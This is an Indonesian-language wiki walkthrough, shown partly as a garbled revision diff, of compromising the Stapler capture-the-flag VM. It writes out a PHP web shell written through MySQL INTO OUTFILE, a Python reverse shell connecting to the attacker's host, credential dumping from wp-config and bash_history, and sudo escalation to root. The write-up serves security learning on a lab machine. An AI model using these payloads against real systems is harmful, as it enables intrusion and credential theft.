[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
+
  import ssl
  |  Latest version: 1.0 (up to date)
+
  ssl._create_default_https_context = ssl._create_unverified_context
  |  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
+
  url = "https://192.168.0.61:12380/blogblog/"
  |  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 
  
[+] Name: akismet
+
Jalankan
|  Latest version: 3.2
 
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/akismet/
 
  
[!] We could not determine a version so all vulnerabilities are printed out
+
cd /home/kali/Downloads/
 +
python2 39646.py
  
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
+
Setelah berhasil jalan, coba masuk ke
    Reference: https://wpvulndb.com/vulnerabilities/8215
 
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 
[i] Fixed in: 3.1.5
 
  
[+] Name: shortcode-ui - v0.6.2
+
  https://192.168.0.61:12380/blogblog/wp-content/uploads/
|  Latest version: 0.6.2 (up to date)
 
| Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/
 
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/shortcode-ui/
 
  
[+] Name: two-factor
+
Akan tampak,
|  Latest version: 0.1-dev-20160412
 
|  Location: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/
 
|  Readme: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 
[!] Directory listing is enabled: https://192.168.1.13:12380/blogblog/wp-content/plugins/two-factor/
 
  
 +
Index of /blogblog/wp-content/uploads
 +
[ICO]         Name         Last modified Size Description
 +
[PARENTDIR] Parent Directory -
 +
[IMG]         1402053515.jpeg 2023-01-23 16:11 3.0K
  
[+] Finished: Tue Oct  4 20:09:29 2016
+
terlihat ada file 1402053515.jpeg
[+] Requests Done: 37
+
Klik kanan di file tersebut, simpan di komputer kita.
[+] Memory used: 32.523 MB
 
[+] Elapsed time: 00:00:04
 
This is great! Not only did we find a ton of users (which seem to correlate to the names we found earlier) but we also found a few XSS Vulnerabilities, a Path Traversal Vulnerability and a few plugins that we can use to research for possible vulnerable entry points.
 
  
After doing some research, I found out that the advanced-video-embed-embed-videos-or-playlists was vulnerable to a LFI Exploit. Which can be found here!
+
cd /home/kali/Downloads/
 +
wget --no-check-certificate https://192.168.0.61:12380/blogblog/wp-content/uploads/1402053515.jpeg
  
Upon downloading the exploit, and running it, I was presented with an SSL error… So I went ahead and edited the code to include the following
+
Rename jpeg :) ...
  
import ssl
+
mv 1402053515.jpeg 1402053515
ssl._create_default_https_context = ssl._create_unverified_context
+
more 1402053515
Once it ran successfully - I navigated to https://192.168.1.13:12380/blogblog/wp-content/uploads/ and was presented with a .jpeg file.
 
  
 +
Hasilnya,
 +
 +
// ** MySQL settings - You can get this info from your web host ** //
 +
/** The name of the database for WordPress */
 +
define('DB_NAME', 'wordpress');
 +
 +
/** MySQL database username */
 +
define('DB_USER', 'root');
 +
 +
/** MySQL database password */
 +
define('DB_PASSWORD', 'plbkac');
 +
 +
/** MySQL hostname */
 +
define('DB_HOST', 'localhost');
 +
 +
Keren! kita dapat password MySQL ..
 +
 +
==Akses MySQL==
 +
 +
Akses MySQL menggunakan,
 +
 +
mysql -u root -p -h 192.168.0.61 -pplbkac
 +
 +
Hasilnya,
 +
 +
Welcome to the MariaDB monitor.  Commands end with ; or \g.
 +
Your MySQL connection id is 119
 +
Server version: 5.7.12-0ubuntu1 (Ubuntu)
 +
 +
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 +
 +
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 +
 +
MySQL [(none)]>
 +
 +
Lihat database yang ada,
 +
 +
MySQL [(none)]> show databases;
 +
+--------------------+
 +
| Database          |
 +
+--------------------+
 +
| information_schema |
 +
| loot              |
 +
| mysql              |
 +
| performance_schema |
 +
| phpmyadmin        |
 +
| proof              |
 +
| sys                |
 +
| wordpress          |
 +
+--------------------+
 +
8 rows in set (0.059 sec)
 +
 +
Pakai database wordpress,
 +
 +
MySQL [(none)]> use wordpress
 +
Reading table information for completion of table and column names
 +
You can turn off this feature to get a quicker startup with -A
 +
 +
Database changed
 +
MySQL [wordpress]>
 +
 +
Cek tables,
 +
 +
MySQL [wordpress]> show tables;
 +
+-----------------------+
 +
| Tables_in_wordpress  |
 +
+-----------------------+
 +
| wp_commentmeta        |
 +
| wp_comments          |
 +
| wp_links              |
 +
| wp_options            |
 +
| wp_postmeta          |
 +
| wp_posts              |
 +
| wp_term_relationships |
 +
| wp_term_taxonomy      |
 +
| wp_terms              |
 +
| wp_usermeta          |
 +
| wp_users              |
 +
+-----------------------+
 +
11 rows in set (0.001 sec)
 +
 +
Cek struktur data wp_users,
 +
 +
MySQL [wordpress]> describe wp_users;
 +
+---------------------+---------------------+------+-----+---------------------+----------------+
 +
| Field              | Type                | Null | Key | Default            | Extra         
 +
|
 +
+---------------------+---------------------+------+-----+---------------------+----------------+
 +
| ID                  | bigint(20) unsigned | NO  | PRI | NULL                | auto_increment |
 +
| user_login          | varchar(60)        | NO  | MUL |                    |               
 +
|
 +
| user_pass          | varchar(64)        | NO  |    |                    |               
 +
|
 +
| user_nicename      | varchar(50)        | NO  | MUL |                    |               
 +
|
 +
| user_email          | varchar(100)        | NO  |    |                    |               
 +
|
 +
| user_url            | varchar(100)        | NO  |    |                    |               
 +
|
 +
| user_registered    | datetime            | NO  |    | 0000-00-00 00:00:00 |               
 +
|
 +
| user_activation_key | varchar(60)        | NO  |    |                    |               
 +
|
 +
| user_status        | int(11)            | NO  |    | 0                  |               
 +
|
 +
| display_name        | varchar(250)        | NO  |    |                    |               
 +
|
 +
+---------------------+---------------------+------+-----+---------------------+----------------+
 +
10 rows in set (0.002 sec)
 +
 +
 +
Print username & password (di hash)
 +
 +
MySQL [wordpress]> SELECT user_login, user_pass FROM wp_users;
 +
+------------+------------------------------------+
 +
| user_login | user_pass                          |
 +
+------------+------------------------------------+
 +
| John      | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
 +
| Elly      | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
 +
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
 +
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
 +
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
 +
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
 +
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
 +
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
 +
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
 +
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
 +
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
 +
| Dave      | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
 +
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
 +
| Abby      | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
 +
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
 +
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
 +
+------------+------------------------------------+
 +
16 rows in set (0.001 sec)
 +
 +
Keren! kita bisa meng-crack password dengan md5 menggunakan hashcat atau menggunakan crack md5 online lewat web.
 +
 +
==MySQL generate shell.php==
 +
 +
Dari shell MySQL ketik,
 +
 +
select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
 +
 +
Akses
 +
 +
https://192.168.0.61:12380/blogblog/wp-content/uploads/
 +
 +
Akan tampak
 +
 +
Index of /blogblog/wp-content/uploads
 +
[ICO]         Name         Last modified Size Description
 +
[PARENTDIR] Parent Directory -
 +
[IMG]         1402053515.jpeg 2023-01-23 16:11 3.0K
 +
[  ]         shell.php 2023-01-23 16:34 39
 +
Apache/2.4.18 (Ubuntu) Server at 192.168.0.61 Port 12380
 +
 +
Terlihat ada shell.php.
 +
Sekarang akses URL berikut untuk mencek apakah shell.php bisa dipakai:) ..
 +
 +
https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig
 +
 +
Hasilnya kira-kira
 +
 +
enp0s3 Link encap:Ethernet HWaddr 08:00:27:8b:94:43 inet addr:192.168.0.61
 +
Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX
 +
packets:299263 errors:91 dropped:0 overruns:0 frame:0 TX packets:97438 errors:0 dropped:0
 +
overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:27580727 (27.5 MB) TX
 +
bytes:69269091 (69.2 MB) Interrupt:19 Base address:0xd000 lo Link encap:Local Loopback inet
 +
addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:468
 +
errors:0 dropped:0 overruns:0 frame:0 TX packets:468 errors:0 dropped:0 overruns:0
 +
carrier:0 collisions:0 txqueuelen:1 RX bytes:50152 (50.1 KB) TX bytes:50152 (50.1 KB)
 +
 +
Inti-nya shell.php bisa di pakai :) ..
 +
 +
 +
==Akses Shell via Web==
 +
 +
Cek IP address & catat kali linux
 +
 +
ifconfig
 +
 +
Misalnya IP address kali linux 192.168.0.62
 +
Siapkan di kali linux,
 +
 +
nc -lvp 443
 +
 +
Lewat browser jalankan URL (asumsi IP address kali linux
 +
 +
https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.62",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 +
 +
Jika berjalan dengan baik akan tampak
 +
 +
192.168.0.61: inverse host lookup failed: Unknown host
 +
connect to [192.168.0.62] from (UNKNOWN) [192.168.0.61] 50340
 +
/bin/sh: 0: can't access tty; job control turned off
 +
$
 +
 +
Gunakan python untuk mengaktifkan bash
 +
 +
$ python -c 'import pty;pty.spawn("/bin/bash")'
 +
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /
 +
cd /
 +
www-data@red:/$ ls
 +
ls
 +
bin  etc            lib        mnt  root  snap  tmp  vmlinuz.old
 +
boot  home            lost+found  opt  run  srv  usr
 +
dev  initrd.img.old  media      proc  sbin  sys  var
 +
www-data@red:/$ cd home
 +
cd home
 +
www-data@red:/home$
 +
 +
Lihat bash_history menggunakan
 +
 +
www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
 +
find -name ".bash_history" -exec cat {} \;
 +
exit
 +
exit
 +
free
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
top
 +
ps aux
 +
exit
 +
exit
 +
id
 +
cat: ./peter/.bash_history: Permission denied
 +
find: './peter/.cache': Permission denied
 +
exit
 +
id
 +
whoami
 +
ls -lah
 +
pwd
 +
ps aux
 +
sshpass -p thisimypassword ssh JKanode@localhost
 +
apt-get install sshpass
 +
sshpass -p JZQuyIN5 peter@localhost
 +
ps -ef
 +
top
 +
kill -9 3747
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
exit
 +
whoami
 +
exit
 +
exit
 +
exit
 +
top
 +
exit
 +
 +
Terlihat ada dua (2) username & password
 +
 +
JKanode thisismypassword
 +
peter  JZQuyIN5
 +
 +
 +
==SSH ke Server==
 +
 +
ssh ke server
 +
 +
ssh peter@192.168.0.61
 +
 +
-----------------------------------------------------------------
 +
~          Barry, don't forget to put a message here          ~
 +
-----------------------------------------------------------------
 +
red%
 +
 +
Menjadi su
 +
 +
red% sudo -l
 +
 +
We trust you have received the usual lecture from the local System
 +
Administrator. It usually boils down to these three things:
 +
 +
    #1) Respect the privacy of others.
 +
    #2) Think before you type.
 +
    #3) With great power comes great responsibility.
 +
 +
[sudo] password for peter:
 +
Matching Defaults entries for peter on red:
 +
    lecture=always, env_reset, mail_badpass,
 +
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 +
 +
User peter may run the following commands on red:
 +
    (ALL : ALL) ALL
 +
red%   
  
 +
==Capture the Flag==
  
 +
red% sudo usermod -s /bin/bash peter
 +
red% sudo -i
 +
➜  ~ cd /root
 +
➜  ~ ls
 +
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
 +
➜  ~ cat flag.txt
 +
16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)<(Congratulations)>16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)
 +
                          .-'''''-.
 +
                          |'-----'|
 +
                          |-.....-|
 +
                          |      |
 +
                          |      |
 +
          _,._            |      |
 +
    __.o`  o`"-.        |      |
 +
  .-O o `"-.o  O )_,._    |      |
 +
( o  O  o )--.-"`O  o"-.`'-----'`
 +
  '--------'  (  o  O    o) 
 +
              `----------`
 +
b6b545dc11b7a270f4bad23432190c75162c4a2b
  
 
==Referensi==
 
==Referensi==
  
 
* https://jhalon.github.io/vulnhub-stapler1/
 
* https://jhalon.github.io/vulnhub-stapler1/

Latest revision as of 10:24, 10 February 2023

Description

+---------------------------------------------------------+
|                                                         |
|                                  __..--\              |
|                          __..--         \             |
|                  __..--          __..--             |
|          __..--          __..--       |             |
|          \ o        __..--____....----""              |
|           \__..--\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --~~Enjoy. Have fun. Happy Hacking.~~--       |
|                                                         |
+---------------------------------------------------------+

Instalasi

  • Download OVA
  • Install di VirtualBox
  • Jalankan

Hack

netdiscover

Cek IP address server Stapler 

netdiscover -r 192.168.0.0/24

hasilnya 

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   
                                                                                                                                                                                                                                 
 29 Captured ARP Req/Rep packets, from 21 hosts.   Total size: 1740                                                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.0.2     40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.4     10:6f:3f:3d:73:d0      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.7     4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.9     10:6f:3f:17:94:94      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.7     4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.61    08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.101   08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.                                                                                                                                                         
 192.168.0.141   b0:a7:b9:b6:c1:c9      3     180  TP-Link Corporation Limited                                                                                                                                                   
 192.168.0.102   6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited                                                                                                                                        
 192.168.0.145   c0:56:27:1c:be:e1      1      60  Belkin International Inc.                                                                                                                                                     
 192.168.0.169   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.170   4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.169   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.170   4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                                                                   
 192.168.0.199   b4:b0:24:3d:8b:3b      1      60  TP-Link Corporation Limited                                                                                                                                                   
 192.168.0.223   c0:56:27:67:0d:a3      1      60  Belkin International Inc.                                                                                                                                                     
 192.168.0.224   28:ff:3e:5c:10:32      4     240  zte corporation                                                                                                                                                               
 192.168.0.222   6c:16:32:63:52:21      4     240  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                                                                   
 192.168.0.144   6e:65:e5:8a:25:0d      1      60  Unknown vendor                                                                                                                                                                
 0.0.0.0         b0:a7:b9:b6:c1:c9      1      60  TP-Link Corporation Limited


Target di VirtualBox biasanya MAC 08:00:..... IP address target disini adalah 

 192.168.0.61    08:00:27:8b:94:43      1      60  PCS Systemtechnik GmbH


Port Scanning

Port scanning 

nmap -sS -A -O -n -p1-60000 192.168.0.61
nmap -v -A 192.168.0.61

Hasilnya kira-kira, 

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 01:11 EST
Initiating SYN Stealth Scan at 01:11
Scanning 192.168.0.61 [1000 ports]
Discovered open port 21/tcp on 192.168.0.61
Discovered open port 139/tcp on 192.168.0.61
Discovered open port 3306/tcp on 192.168.0.61
Discovered open port 80/tcp on 192.168.0.61
Discovered open port 53/tcp on 192.168.0.61
Discovered open port 22/tcp on 192.168.0.61
Discovered open port 666/tcp on 192.168.0.61
Scanning 7 services on 192.168.0.61
Nmap scan report for 192.168.0.61
Host is up (0.00066s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp         vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp   open   domain      dnsmasq 2.75
| dns-nsid: 
|   NSID: 218m83 (3231386d3833)
|   id.server: CGK
|_  bind.version: dnsmasq-2.75
80/tcp   open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
139/tcp  open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp  open   doom?
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 10
|   Capabilities flags: 63487
|   Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, FoundRows, 
SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, IgnoreSigpipes, 
Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, 
LongPassword, ODBCClient, ConnectWithDatabase, SupportsCompression, SupportsAuthPlugins, 
SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: <Xp\x1EH]w*\x1C"+\x14\x19\x16*\x15ZnR\x1D
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:8B:94:43 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.005 days (since Mon Jan 23 01:04:14 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel  

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
| smb2-time: 
|   date: 2023-01-23T13:11:23
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   RED<00>              Flags: <unique><active>
|   RED<03>              Flags: <unique><active>
|   RED<20>              Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED\x00
|   Domain name: \x00
|   FQDN: red
|_  System time: 2023-01-23T13:11:23+00:00 

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.0.61

OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds
           Raw packets sent: 2024 (90.564KB) | Rcvd: 24 (1.428KB)

Salah satu yang menarik disini adalah FTP, dengan anonymous FTP login.

Anonymous FTP

Coba login anonymous ftp (username anonymous password bebas merdeka) 

ftp 192.168.0.61 
Connected to 192.168.0.61.
220-
220-|----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|----------------------------------------------------------------------------------------|
220-
220 
Name (192.168.0.61:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Keren! cek ada file apa saja di FTP server tersebut dan ambil file yang ada :) .. 

ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             107 Jun 03  2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% 
|*************************************************************************************************************************************************************************************|   
107        0.91 KiB/s    00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (0.91 KiB/s)
ftp> quit
221 Goodbye.

Buka note 

cat note

Isinya, 

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Tidak ada yang terlalu menarik,tapi ada dua (2) nama :) ... mungkin bisa membantu nanti jika kita butuh bruteforce.

Coba SSH root

Coba akses. 

ssh root@192.168.0.61

Hasilnya gagal, 

The authenticity of host '192.168.0.61 (192.168.0.61)' can't be established.
ED25519 key fingerprint is SHA256:eKqLSFHjJECXJ3AvqDaqSI9kP+EbRmhDaNZGyOrlZ2A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.61' (ED25519) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
root@192.168.0.61's password: 
Permission denied, please try again.


Tapi kita dapat satu nama lagi :) ..

Coba SMB

Coba, 

smbclient -L 192.168.0.61

Password for [WORKGROUP\root]:

Coba isi password dengan root. Untung2-an berhasil :) .. Hasilnya kira-kira 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        kathy           Disk      Fred, What are we doing here?
        tmp             Disk      All temporary files should be stored here
        IPC$            IPC       IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------  

        Workgroup            Master
        ---------            -------
        WORKGROUP            SCANDISK


Tampaknya ada 2 active share - kathy dan tmp. Yang menarik ada komentar - Fred, What are we doing here? Tampaknya Fred bisa mengakses kathy share. Mari kita akses kathy share menggunakan networked user/computer fred. 

smbclient //fred/kathy -I 192.168.0.61 -N

Coba check ls 

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  3 12:52:52 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
  backup                              D        0  Sun Jun  5 11:04:14 2016

                19478204 blocks of size 1024. 16397108 blocks available
smb: \>

Keren! tampaknya kita bisa tersambung. Lakukan enumerate file dan folder. 

smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
  .                                   D        0  Sun Jun  5 11:02:27 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016

                19478204 blocks of size 1024. 16397108 blocks available
smb: \kathy_stuff\> get todo-list.txt 
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.3 KiloBytes/sec) 
(average 3.3 KiloBytes/sec)
smb: \kathy_stuff\> cd ..
smb: \> cd backup\
smb: \backup\> ls
  .                                   D        0  Sun Jun  5 11:04:14 2016
  ..                                  D        0  Fri Jun  3 12:52:52 2016
  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016
  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015 

                19478204 blocks of size 1024. 16397108 blocks available
smb: \backup\> get vsftpd.conf 
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (306.4 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \backup\> quit


Setelah kita selesai dengan kathy share, kita bisa lakukan hal yang sama untuk tmp share, 

smbclient //fred/tmp -I 192.168.0.61 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun  7 04:08:39 2016
  ..                                  D        0  Mon Jun  6 17:39:56 2016
  ls                                  N      274  Sun Jun  5 11:32:58 2016

                19478204 blocks of size 1024. 16397096 blocks available
smb: \> quit

Tampaknya tidak ada yang menarik, paling tidak kita dapat file konfigurasi FTP, dan to-do-list.

Coba kita lihat, 

cat todo-list.txt

isinya, 

I'm making sure to backup anything important for Initech, Kathy

Coba kita lihat, 

cat ls

isinya, 

.:
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ


Nikto 12380

Cek web 

nikto -h 192.168.0.61:12380

Hasilnya, 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.61
+ Target Hostname:    192.168.0.61
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are 
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put 
here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are 
you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put 
here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2023-01-23 01:55:17 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to 
protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render 
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 
is the EOL for the 2.x branch.
